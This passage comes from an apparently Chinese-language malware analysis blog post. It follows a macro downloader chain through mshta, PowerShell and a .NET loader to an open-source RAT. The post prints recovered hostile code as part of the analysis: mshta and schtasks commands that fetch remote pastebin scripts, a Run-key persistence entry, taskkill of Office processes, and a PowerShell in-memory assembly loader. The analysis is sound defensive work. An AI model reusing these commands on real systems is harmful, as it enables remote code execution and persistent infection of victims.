<p>可以使用Microsoft MSHTA.exe工具解析这些文件。</p>
</blockquote>
<ul>
<li><p><code>mshta.exe</code>是微软自家的程序，但是过分的自由导致他非常的危险，因为他可以解析执行很多脚本代码，比如执行<code>JS</code>代码：</p>
<ul>
<li><code>mshta javascript:window.execScript(&quot;alert(&#39;hello world!&#39;);&quot;,&quot;javascript&quot;)</code></li>
</ul>
<p>也可以执行<code>VBS</code>代码：</p>
<ul>
<li><code>mshta vbscript:window.execScript(&quot;msgBox(&#39;hello world!&#39;)&quot;,&quot;vbscript&quot;)</code></li>
</ul>
<p>如果不想又窗口提示还可以添加<code>:window.close</code>让窗口关闭：</p>
<p><img src="tre.gif"></p>
</li>
<li><p>同样的，这些命令也可以写在远程服务器上，这样的话，就可以随时修改命令</p>
</li>
</ul>
<h2 id="溯源获取PayLoad"><a href="#溯源获取PayLoad" class="headerlink" title="溯源获取PayLoad"></a>溯源获取<code>PayLoad</code></h2><ul>
<li><p>获取到文件的MD5之后，直接在各大沙箱搜<code>MD5</code>，在<code>Malware Reports</code>上搜索到了样本</p>
</li>
<li><p>终于可以看到在这个网页获取什么恶意命令了，哈哈哈，然后</p>
<p><img src="1568707283814.png" alt="1568707283814"></p>
</li>
<li><p>太真实了，写个宏，又是密码又是白利用，最后就为了弹个窗来钓鱼。。。啪！。。。</p>
</li>
</ul>
<h2 id="正常的一波"><a href="#正常的一波" class="headerlink" title="正常的一波"></a>正常的一波</h2><ul>
<li><p>更换一个沙箱，才能正常的找到请求的数据</p>
<p><img src="1568711636126.png" alt="1568711636126"></p>
<p>。。。啪。。。。</p>
</li>
<li><p>实际上使用<code>wget</code>命令，或者使用<code>python</code>造包获取网页能拿到网页源码</p>
<p><img src="1568712290013.png" alt="1568712290013"></p>
<p>。。。啪。。。</p>
</li>
<li><p><code>wget</code>还是坚挺</p>
<p><img src="1568712388295.png" alt="1568712388295"></p>
</li>
<li><p>然后检查<code>&lt;Script&gt;</code>标签</p>
<p><img src="1568712605113.png" alt="1568712605113"></p>
</li>
<li><p>这种编码的感觉就是坏蛋，用脚本解码，然后发现是一个<code>JS</code>脚本，执行了一个新的<code>URL</code>，泪流满面</p>
<p><img src="1568712787996.png" alt="1568712787996"></p>
</li>
<li><p>最关键的来了，这条路断了，人家<code>404</code>了！！！！！真不给活路呀，/大哭。</p>
</li>
<li><p>所以还是靠沙箱，老套路，解密<code>URL</code>编码，然后分析，这次，人家访问了三个<code>URL</code>。。。。</p>
<p><img src="1568713407860.png" alt="1568713407860"></p>
<p><img src="1568713418906.png" alt="1568713418906"></p>
<p><img src="1568713432694.png" alt="1568713432694"></p>
</li>
<li><p>不过好险，这三个的内容是一样的，而且都可以通过wget直接获取到</p>
<p><img src="1568717291309.png" alt="1568717291309"></p>
<p><img src="1568717376639.png" alt="1568717376639"></p>
<p><img src="1568717355454.png" alt="1568717355454"></p>
<p><img src="1568947536639.png" alt="1568947536639"></p>
</li>
<li><p>这样就拿到了最终要执行的样本。。。啪。。。</p>
</li>
<li><p>你以为结束了吗？这个<code>PowerShell</code>解密之后，还是一个下载器，开心吗？</p>
<p><img src="1568720149895.png" alt="1568720149895"></p>
</li>
<li><p>继续抓取样本</p>
<p><img src="1568720374808.png" alt="1568720374808"></p>
</li>
</ul>
<h2 id="DownLoad分析"><a href="#DownLoad分析" class="headerlink" title="DownLoad分析"></a><code>DownLoad</code>分析</h2><h2 id="DownLoad-8hsshjassahsh"><a href="#DownLoad-8hsshjassahsh" class="headerlink" title="DownLoad- ==8hsshjassahsh=="></a><code>DownLoad</code>- ==8hsshjassahsh==</h2><ul>
<li><p>获取到的文件都是<code>.hta</code>的文件，但是有几个不同，比如说他真就是个<code>Html</code>页面。。。直接找<code>&lt;Script&gt;</code>标签，找到恶意样本所在的标签</p>
<p><img src="1568717725098.png" alt="1568717725098"></p>
</li>
<li><p>然后使用简单的代码，利用<code>URL</code>编码解码这串数据，得到解密的脚本信息，实际上，也可以使用浏览器来执行<code>JS</code>指令来完成解密</p>
<p><img src="ent.gif" alt="ent"></p>
<p>然而别跟我说那么多，我还是写脚本完成</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Python实现URL编码脚本</span></span><br><span class="line"><span class="keyword">import</span> urllib.parse</span><br><span class="line">rawurl = <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    # 待解密文本</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">decode_text = urllib.parse.unquote(rawurl)</span><br><span class="line">print(decode_text)</span><br></pre></td></tr></table></figure>

<p>得到解密的数据：</p>
<p><img src="1568717986373.png" alt="1568717986373"></p>
<p>实际上我们整理一下代码，可读性会提高不少</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Set</span> WSShell = <span class="built_in">CreateObject</span>(<span class="string">&quot;WScript.Shell&quot;</span>)</span><br><span class="line"><span class="keyword">Set</span> comline = <span class="string">&quot;mshta http://www.pastebin.com/raw/nv5d9pYu&quot;</span></span><br><span class="line">WSShell.Run(comline, vbHide)</span><br></pre></td></tr></table></figure>

<p>这提高的不是一点半点。。。。</p>
</li>
<li><p>所以到这里，样本开始下载下一个样本<code>nv5d9pYu</code></p>
</li>
</ul>
<h2 id="DownLoad-nv5d9pYu"><a href="#DownLoad-nv5d9pYu" class="headerlink" title="DownLoad - ==nv5d9pYu=="></a><code>DownLoad</code> - ==nv5d9pYu==</h2><ul>
<li><p>拿到样本的时候，就可以看见，是使用了和之前一样的编码方法，使用相同的方法处理一下即可。</p>
<p><img src="1568703366807.png" alt="1568703366807"></p>
<p>这个文件只有一个<code>Script</code>标签，所以直接将<code>javascript</code>代码抠出来，然后<code>URL</code>解码，整理就得到代码了</p>
</li>
</ul>
<ul>
<li><p>首先代码有一些混淆，但是并不妨碍我们阅读逻辑，第一段代码：</p>
<p><img src="1568718523308.png" alt="1568718523308"></p>
<p>简单整理</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Set</span> WSShell = <span class="built_in">CreateObject</span>(<span class="string">&quot;WScript.Shell&quot;</span>)</span><br><span class="line">  <span class="keyword">Dim</span> ComLine</span><br><span class="line">  ComLine = <span class="string">&quot;cmd.exe /c taskkill /f /im winword.exe &amp; taskkill /f /im excel.exe &amp; taskkill /f /im MSPUB.exe &amp; taskkill /f /im POWERPNT.EXE &amp; exit&quot;</span></span><br><span class="line">  WSShell.Run(ComLine, vbHide)</span><br></pre></td></tr></table></figure>


</li>
</ul>
<pre><code>- `/f`：强制结束
- `/im`：指定镜像名</code></pre>
<p>  创建一个对象，然后定义变量，命令行强行<code>Kill</code>4个镜像，我们看看这4个镜像是干什么的</p>
<pre><code>- `winword.exe`：winword.exe是 Microsoft Word的主程序。
- `excel.exe`：excel.exe是 Microsoft Excel的主程序。
- `MSPUB.exe`：mspub.exe是属于Microsoft Publisher产品的主要进程。
- `POWERPNT.EXE`：powerpnt.exe是Microsoft PowerPoint产品相关程序，用于进行演示文档。

也就是说，他把`Office`相关的组件全部干掉？？？然后就关闭终端了 `Exit`</code></pre>
<ul>
<li><p>第二段和第三段类似，都是在<strong>创建服务</strong>继续利用<code>mshta</code>执行命令</p>
<p><img src="1568718543116.png" alt="1568718543116"></p>
<p>还是很鸡贼的使用了<code>StrReverse</code>函数将字符串倒过来写，但是第一行两次使用等于没有改变方向。。。整理一下：</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Set</span> Mi_G = <span class="built_in">CreateObject</span>(<span class="string">&quot;WScript.Shell&quot;</span>)</span><br><span class="line"><span class="keyword">Dim</span> ComLine = <span class="string">&quot;schtasks /create /sc MINUTE /mo 06 /tn Windows Update /tr mshta.exe http://pastebin.com/raw/vXpe74L2 /F&quot;</span></span><br><span class="line">Mi_G.Run(ComLine, vbHide)</span><br></pre></td></tr></table></figure>

<ul>
<li><code>schtasks</code>：计划任务相关命令行工具</li>
<li><code>/create</code>：创建计划任务</li>
<li><code>/mo</code>：改进计划类型以允许更好地控制计划重复周期。</li>
<li><code>/sc</code>： 指定计划频率中等</li>
<li><code>/tn</code>： 以路径或者名称形式指定对此计划任务进行唯一标识的字符串。</li>
<li><code>/tr</code>：指定在这个计划时间运行的程序的路径和文件名。</li>
</ul>
<p>就是设置了一个计划任务，来使恶意脚本驻留在中招的计算机上。</p>
</li>
<li><p>第三段执行的命令：</p>
<p><img src="1568718651259.png" alt="1568718651259"></p>
<p><code>schtasks /create /sc MINUTE /mo 003 /tn Update /tr mshta.exe http://pastebin.com/raw/JdTuFmc5 /F</code></p>
<p>可以看到，与第二段的命令是一样的，只是替换了<code>/mo</code>的参数，约定的名称和路径，名称还是叫升级程序。。。。</p>
</li>
<li><p>第四段代码就不一样的，直接就是修改注册表项，开机自启动，去执行一波恶意脚本先</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Set</span> Xm_w = <span class="built_in">CreateObject</span>(<span class="string">&quot;WScript.Shell&quot;</span>)</span><br><span class="line">L_Xe = <span class="string">&quot;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate&quot;</span></span><br><span class="line">Xm_w.RegWrite L_Xe,<span class="string">&quot;mshta.exe http://pastebin.com/raw/CGe3S2Vf&quot;</span>,<span class="string">&quot;REG_EXPAND_SZ&quot;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>接下来就分析新的获取到的样本，上面我们已经知道了，这三个样本实际上是一样的，所以我们选最下面这个来分析</p>
</li>
</ul>
<h2 id="DownLoad-CGe3S2Vf"><a href="#DownLoad-CGe3S2Vf" class="headerlink" title="DownLoad - ==CGe3S2Vf=="></a><code>DownLoad</code> - ==CGe3S2Vf==</h2><ul>
<li><p>首先同样的套路处理文本</p>
<p><img src="1568718896110.png" alt="1568718896110"></p>
</li>
<li><p>分析到这一步，终于要执行恶意逻辑的代码了</p>
<p><img src="1568718790294.png" alt="1568718790294"></p>
</li>
<li><p>这里可以看到，执行的代码还得替换和倒序，才给<code>PowerShell</code>执行</p>
</li>
<li><p>我们使用<code>Python</code>默默的给他解密</p>
<p><img src="1568719303353.png" alt="1568719303353"></p>
</li>
<li><p>得到新的样本，命名为<code>PowerShell01</code></p>
</li>
</ul>
<h2 id="DownLoad-PowerShell01"><a href="#DownLoad-PowerShell01" class="headerlink" title="DownLoad - ==PowerShell01=="></a><code>DownLoad</code> - ==PowerShell01==</h2><ul>
<li><p>这个样本，还是在写一个新的样本执行，我们替换<code>IEX</code>为<code>Write-Host</code>，将内容输出到控制台</p>
<p><img src="1568719876899.png" alt="1568719876899"></p>
</li>
<li><p>输出的内容取个名字叫<code>PowerShell02</code>，继续跑</p>
</li>
</ul>
<h2 id="DownLoad-PowerShell02"><a href="#DownLoad-PowerShell02" class="headerlink" title="DownLoad - ==PowerShell02=="></a><code>DownLoad</code> - ==PowerShell02==</h2><ul>
<li><p>然后我们发现，我们可爱的脚本，转了一圈又回去了，还在下载两个新的，然后执行</p>
<p><img src="1568720149895.png" alt="1568720149895"></p>
</li>
<li><p>继续下载新的样本。同时，我们可以发现，在代码中出现了==MSBuild.exe==以及==GetMethod==，这就值得怀疑，代码是不是在释放文件，然后调用文件的某些功能</p>
</li>
<li><p>事实证明果然是这样的，首先必须更正一点，就是脚本语言的执行逻辑</p>
</li>
</ul>
<blockquote>
<h2 id="脚本执行逻辑"><a href="#脚本执行逻辑" class="headerlink" title="脚本执行逻辑"></a><span id="bate" style="background-color:#ffc7ff">脚本执行逻辑</span></h2><ul>
<li>我们使用一个简单的脚本来尝试<br><img src="fiv.gif" alt="fiv"><br>这里是在简单演示脚本执行的过程，我们可以看到，是一条一条指令执行的，这就说明了对于变量的定义域，还有函数，与<code>C</code>语言有很大的不同，我们可以在字符串中写一条指令，定义一个任意的变量，如果这个字符串没有被执行，也就是没有被解释器当作指令处理，那么，后面使用这个变量的时候，就会出错，但是<code>PowerShell</code>中有一条很强的指令<code>Invoke-Expression</code>又称<code>IEX</code>，这条指令的作用就是执行一个脚本，但是真正的使用一般都是使用他来执行一条原本是数据的东西，达到绕过检测的目的。</li>
<li>执行字符串<code>$a</code><br><img src="1568811768760.png" alt="1568811768760"></li>
<li>可以看到原本是一个字符串，后面接上<code>IEX</code>，那么结果是什么呢<br><img src="1568811843745.png" alt="1568811843745"></li>
<li>可以看到，直接到临时目录下创建一个文件，来执行刚刚的指令，同时在执行后，我们可以看到，原本的变量域，<code>$b</code>被定义了<br><img src="1568811920864.png" alt="1568811920864"></li>
<li>这个样本就是利用这个原理，在被加密的代码中建立变量，在后面使用，导致分析的时候被障眼法误导，完全摸不着头脑。</li>
</ul>
</blockquote>
<ul>
<li><p>回到正题，我们后面的两个脚本必须视为在这个脚本中执行的才行，因为他们是同一个域。</p>
</li>
<li><p>所以我们终于在第三层样本中找到对应的变量被定义</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$a</span> = [<span class="type">Microsoft.VisualBasic.Interaction</span>]::CallByname([<span class="type">System.Threading.Thread</span>]::GetDomain(),<span class="string">&#x27;LoaXXXXXX&#x27;</span>.replace(<span class="string">&#x27;XXXXXX&#x27;</span>,<span class="string">&#x27;d&#x27;</span>),[<span class="type">Microsoft.VisualBasic.CallType</span>]::Method,<span class="variable">$Cli</span>)</span><br></pre></td></tr></table></figure>
</li>
<li><p>通过前面的学习，我们可以知道，这行指令的作用，返回的<code>$a</code>是加载二进制数据之后的句柄</p>
</li>
<li><p>那么接下来的代码就好解释了</p>
<p><img src="1568812725529.png" alt="1568812725529"></p>
</li>
<li><p>首先==第八行==，获取一个对象的模板，然后==第九行==，获取一个对象的方法，==第十行==实例化一个对象，==第十一行==使用对象的<code>$y</code>方法，传入参数<code>$obj</code>这个元组的两个数据，就是参数</p>
</li>
</ul>
<h2 id="DownLoad-wMG90xwi"><a href="#DownLoad-wMG90xwi" class="headerlink" title="DownLoad - ==wMG90xwi=="></a><code>DownLoad</code> - ==wMG90xwi==</h2><ul>
<li><p>居然还在解密，但是样本大小<code>700+ KB</code>感觉已经快要接触到样本的恶意逻辑了。</p>
<p><img src="D:\MarkDown\2019.09\190915-白利用样本分析.assets\1568784995383.png" alt="1568784995383"></p>
</li>
</ul>
<h2 id="PayLoad分析"><a href="#PayLoad分析" class="headerlink" title="PayLoad分析"></a><code>PayLoad</code>分析</h2><h2 id="Loader-DumpPE01-dll"><a href="#Loader-DumpPE01-dll" class="headerlink" title="Loader- DumpPE01.dll "></a><code>Loader</code>-<span style="background-color:#c7ffff"> DumpPE01.dll </span></h2><ul>
<li><p>上面我们成功得到新的脚本之后，我们可以发现新的数据开头是<code>0x4D 0x5A</code>，顿时感觉数据应该就是一个可知性文件，恰好脚本后面，是<code>CallByname</code>参数则是当前域和<code>Load</code></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$t0</span>=<span class="string">&#x27;DEX&#x27;</span>.replace(<span class="string">&#x27;D&#x27;</span>,<span class="string">&#x27;I&#x27;</span>);</span><br><span class="line"><span class="built_in">Set-Alias</span> g <span class="variable">$t0</span>;</span><br><span class="line">[<span class="built_in">Byte</span>[]]<span class="variable">$Cli</span>=(<span class="string">&quot;# 加密文件 Hex数据&quot;</span>.replace(<span class="string">&#x27;G*&#x27;</span>,<span class="string">&#x27;0x&#x27;</span>))| g;</span><br><span class="line"><span class="string">&#x27;[Microsoft.VisualBasic.Interaction]::CallByname(</span></span><br><span class="line"><span class="string">  [System.Threading.Thread]::GetDomain(),</span></span><br><span class="line"><span class="string">  &#x27;</span>LoaXXXXXX<span class="string">&#x27;.replace(&#x27;</span>XXXXXX<span class="string">&#x27;,&#x27;</span>d<span class="string">&#x27;),</span></span><br><span class="line"><span class="string">  [Microsoft.VisualBasic.CallType]::Method,$Cli</span></span><br><span class="line"><span class="string">);</span></span><br></pre></td></tr></table></figure>

<ul>
<li><span style="background-color:#ffc7c7"> **CallByName **(<em>object</em>, <em>procname</em>, <em>calltype</em>, [args()]_)：</span><ul>
<li><span style="background-color:#ffffc7"> <em>object</em> </span>：对象，要执行函数的主题，在这里是当前域。</li>
<li><span style="background-color:#ffffc7"> <em>procname</em> </span>：字符串，该方法的名称的字符串表达式。</li>
<li><span style="background-color:#ffffc7"> <em>calltype</em> </span>：常数，这里是<code>Method</code></li>
<li><span style="background-color:#ffffc7"> <em>[args()]_</em> </span>：可选，这里是<code>Load</code>的参数，在这里也就是刚刚解密出来的<code>[Byte[]]$Cli</code>，用句柄或者内存地址来形容会更贴切一些</li>
</ul>
</li>
</ul>
<p><img src="D:\MarkDown\2019.09\190915-白利用样本分析.assets\1568787067786.png" alt="1568787067786"></p>
</li>
<li><p>那么现在，我们需要将内容<code>Dump</code>为一个对应的<code>PE</code>文件</p>
<p><img src="fre.gif" alt="fre"></p>
</li>
<li><p>通过工具<code>Die</code>简单检查，就可以判断，这个样本是一个<code>DLL</code>，</p>
<p><img src="1568805329247.png" alt="1568805329247"></p>
</li>
<li><p>由于是<code>.net</code>程序，我们直接使用工具<code>dnSpy</code>对他进行反汇编，就不用出动<code>IDA</code>了，才不会告诉你们，是因为看不懂<code>IDA</code>的代码呢~</p>
<p><img src="1568805699447.png" alt="1568805699447"></p>
</li>
<li><p>但是有一点要清楚，我们要看的，或者说要注意的，是<code>DLL</code>的主函数，也就是<code>DllMain</code>，因为，在代码中，就是载入<code>DLL</code>就结束了，说明，如果这个样本是要进行恶意操作，那么操作必然会在<code>main</code>里面就完成了。</p>
</li>
<li><p>但是在疯狂混淆的代码中逛了一圈，除了眼药水用的不少，还真没什么发现。悲惨的发现，使用这个样本是在接下来的代码中</p>
</li>
<li><p>回到上面去分析，我们知道是==使用==这个<code>DLL</code>的<code>THC452563sdfdsdfgr4777cxg04477fsdf810df777</code>对象的<code>retrt477fdg145fd4g0wewerwedsa799221dsad4154qwe</code>方法，而传入的参数就是元组<code>$obj</code>，在这里，内容就是<code>@(&#39;MSBuild.exe&#39;,$f)</code>，分别是一个<code>String</code>和一个<code>Byte[]</code>，我们再去查看对应的方法的参数</p>
<p><img src="1568873153365.png" alt="1568873153365"></p>
</li>
<li><p>这样就知道，我们继续看的方向应该是什么了。</p>
</li>
<li><p>接下来我们分析第一个函数的作用</p>
<p><img src="1568873457430.png" alt="1568873457430"></p>
</li>
<li><p>虽然有非常多我们不知道的内容，比如这4个常量有什么用，但是我们可以看到，最终要执行的肯定是<code>Myvictim</code>类的<code>Dodo</code>方法，所以我们继续分析下一个函数==(这里还可以看到，我们传入的两个参数，被原封不动的传给了新的函数)==</p>
<p><img src="1568873708954.png" alt="1568873708954"></p>
<p>这个新的函数中看到这样的手法我们就可以认定，之前的那种方式肯定是在使用混淆，所以我们还是可以根据分析上一个函数的方式直接看下一个函数，这个时候有一点不同的地方产生了，这个函数中有非常多的代码，我们不知道什么是我们关注的代码，简单的来说，这样的<code>switch case</code>结构，我们无法掌握程序运行的先后，所以我们分析的时候不容易掌握到重点，找到重点的方法就是高亮传入的参数，用参数的使用来串联这个代码。</p>
</li>
<li><p>首先高亮第一个参数，这个参数应该是我们传入的字符串<code>MSBuild.exe</code></p>
<p><img src="1568874084103.png" alt="1568874084103"></p>
<p><img src="1568874099252.png" alt="1568874099252"></p>
<p><img src="1568874116597.png" alt="1568874116597"></p>
<p><img src="1568874134581.png" alt="1568874134581"></p>
<p><img src="1568874155036.png" alt="1568874155036"></p>
<p>我们逐渐的分析，到底使用字符串干了什么，首先可以看到定义了一些字符串，每次使用参数1都会定义新的字符串，但是最后一个不同，是获取了运行的目录，然后处理，所以，我们可以先猜测，这个字符串是不是于路径相关</p>
</li>
<li><p>然后第二条线，就是第二个参数<code>$f</code>，一个<code>byte[]</code>类型</p>
<p><img src="1568874407622.png" alt="1568874407622"></p>
<p><img src="1568874427796.png" alt="1568874427796"></p>
<p><img src="1568874447295.png" alt="1568874447295"></p>
<p><img src="1568874465857.png" alt="1568874465857"></p>
<p><img src="1568874482584.png" alt="1568874482584"></p>
<p><img src="1568874503425.png" alt="1568874503425"></p>
<p>这一条线来看呢，这个参数无论做了什么处理，一定会被放到函数<code>tickleme</code>中作为参数，而且<code>case 25</code>是这两个参数都存在的位置</p>
</li>
<li><p>函数<code>tickleme</code></p>
<p><img src="1568874749307.png" alt="1568874749307"></p>
<p>同理，直接跟入下一个函数<code>FUN</code></p>
</li>
<li><p>函数<code>FUN</code></p>
<p>这次就不一一截图了，首先是第一个参数，这里直接就是<code>path</code>印证了我们的思路。</p>
<p><img src="1568874859753.png" alt="1568874859753"></p>
<p><img src="1568874870034.png" alt="1568874870034"></p>
</li>
<li><p>函数<code>smethod_0</code></p>
<p><img src="1568874897850.png" alt="1568874897850"></p>
<p>很快，我们就可以发现，第一个参数<code>path</code>的作用</p>
<p><img src="1568874947103.png" alt="1568874947103"></p>
<p>用来创建一个新的进程</p>
<p>而我们传入的第二个参数，也就是数据流被写入了这个进程</p>
<p><img src="1568875033757.png" alt="1568875033757"></p>
</li>
<li><p>到这里，对<code>DumpPE01.dll</code>的分析就可以暂时结束了，因为我们所需要的东西在新的<code>exe</code>中，而这个<code>DLL</code>的意义就是将<code>exe</code>加载到内存中</p>
</li>
</ul>
<h2 id="PayLoad-RAT-DumpPE02-exe"><a href="#PayLoad-RAT-DumpPE02-exe" class="headerlink" title="PayLoad-RAT- DumpPE02.exe "></a><code>PayLoad-RAT</code>-<span style="background-color:#c7ffff"> DumpPE02.exe </span></h2><ul>
<li><p>获取第二个<code>PE</code>样本的方式和获取第一个的方式基本相同，但是呢，不同点就是在网络上下载的，不是一个脚本，而是一堆数据。这使得我们需要手动去解密数据(说的我们之前就不是手动解密一样2333)。</p>
</li>
<li><p>在上文中的分析，我们可以知道，最终这个数据是被写入到进程的内存空间中，所以我们帮他<code>Dump</code>到本地</p>
<p><img src="1568806631396.png" alt="1568806631396"></p>
</li>
<li><p>这次获取的<code>PE</code>文件，虽然是<code>.NET</code>程序，但是却使用了壳，我们使用工具<code>de4dot</code>来对这个程序脱壳</p>
<p><img src="six.gif" alt="six"></p>
</li>
<li><p>脱壳完成之后，我么还是使用<code>dnSpy</code>对他进行反汇编，这个<code>PE</code>文件是一个<code>exe</code>，所以第一步是<code>Main</code>从主函数一步一步的分析内容(实际上，第一步不都是搜索字符串嘛2333333)</p>
<p><img src="1568875595468.png" alt="1568875595468"></p>
<p>先找到<code>Main</code>再去搜索字符春，捂嘴偷笑</p>
</li>
<li><p>主函数中直接使用了一个对象的方法，我们直接看这个对象，就找到了特征字符串</p>
<p><img src="1568891469826.png" alt="1568891469826"></p>
<p><img src="1568891491536.png" alt="1568891491536"></p>
</li>
<li><p>可以在构造函数中看到一个域名还有两段字符串，而且远控服务器的域名还加上了一个<code>,</code>需要使用函数去掉那个逗号才能使用（是不是闲的没事干，你说，有这功夫还不如加密一下域名呢）</p>
</li>
<li><p>网络上使用特征字符串搜索，很快就可以得到我们想要的信息</p>
<p><img src="1568891638233.png" alt="1568891638233"></p>
</li>
<li><p>说明这是一个远控木马（又是开源的！！！有没有创意啊！！！）</p>
<p>这个<code>RAT</code>可以在网络上获取他的生成工具，以及服务端，所以我们直接尝试生成一个</p>
<p><img src="siv-1568895130146.gif" alt="siv"></p>
</li>
<li><p>尤其是我们生成的样本的特征，与我们拿到的样本，基本吻合</p>
<p><img src="1568895237529.png" alt="1568895237529"></p>
<p>所以我们接下来，直接找到最主要的内容</p>
<p><img src="1568895619765.png" alt="1568895619765"></p>
</li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%AE%8F%E7%97%85%E6%AF%92/" rel="tag"># 宏病毒</a>
              <a href="/tags/%E7%99%BD%E5%88%A9%E7%94%A8/" rel="tag"># 白利用</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2019/09/17/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190917-%E5%8A%A0%E5%A3%B3DLL%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/" rel="prev" title="加壳DLL样本分析">
      <i class="fa fa-chevron-left"></i> 加壳DLL样本分析
    </a></div>
      <div class="post-nav-item">
    <a href="/2019/09/23/05_%E4%B8%AA%E4%BA%BA%E7%AC%94%E8%AE%B0/ECDH%20%E5%AF%86%E9%92%A5%E5%8D%8F%E5%95%86%E5%8E%9F%E7%90%86/" rel="next" title="ECDH 密钥协商原理">
      ECDH 密钥协商原理 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%A6%82%E8%BF%B0"><span class="nav-number">1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%A0%B7%E6%9C%AC%E5%9F%BA%E7%A1%80%E4%BF%A1%E6%81%AF"><span class="nav-number">2.</span> <span class="nav-text">样本基础信息</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%8A%80%E6%9C%AF%E5%88%86%E6%9E%90"><span class="nav-number">3.</span> <span class="nav-text">技术分析</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E6%9D%A5%E6%BA%90"><span class="nav-number">4.</span> <span class="nav-text">攻击来源</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8%E5%AF%86%E7%A0%81%E4%BF%9D%E6%8A%A4%E5%AE%8F"><span class="nav-number">5.</span> <span class="nav-text">使用密码保护宏</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E6%9E%90VBA%E5%AE%8F%E4%BB%A3%E7%A0%81"><span class="nav-number">5.1.</span> <span class="nav-text">分析VBA宏代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mshta-%E7%99%BD%E5%88%A9%E7%94%A8%E7%AE%80%E6%9E%90"><span class="nav-number">5.2.</span> <span class="nav-text">mshta 白利用简析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BA%AF%E6%BA%90%E8%8E%B7%E5%8F%96PayLoad"><span class="nav-number">5.3.</span> <span class="nav-text">溯源获取PayLoad</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%AD%A3%E5%B8%B8%E7%9A%84%E4%B8%80%E6%B3%A2"><span class="nav-number">5.4.</span> <span class="nav-text">正常的一波</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DownLoad%E5%88%86%E6%9E%90"><span class="nav-number">5.5.</span> <span class="nav-text">DownLoad分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DownLoad-8hsshjassahsh"><span class="nav-number">5.6.</span> <span class="nav-text">DownLoad- &#x3D;&#x3D;8hsshjassahsh&#x3D;&#x3D;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DownLoad-nv5d9pYu"><span class="nav-number">5.7.</span> <span class="nav-text">DownLoad - &#x3D;&#x3D;nv5d9pYu&#x3D;&#x3D;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DownLoad-CGe3S2Vf"><span class="nav-number">5.8.</span> <span class="nav-text">DownLoad - &#x3D;&#x3D;CGe3S2Vf&#x3D;&#x3D;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DownLoad-PowerShell01"><span class="nav-number">5.9.</span> <span class="nav-text">DownLoad - &#x3D;&#x3D;PowerShell01&#x3D;&#x3D;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DownLoad-PowerShell02"><span class="nav-number">5.10.</span> <span class="nav-text">DownLoad - &#x3D;&#x3D;PowerShell02&#x3D;&#x3D;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" 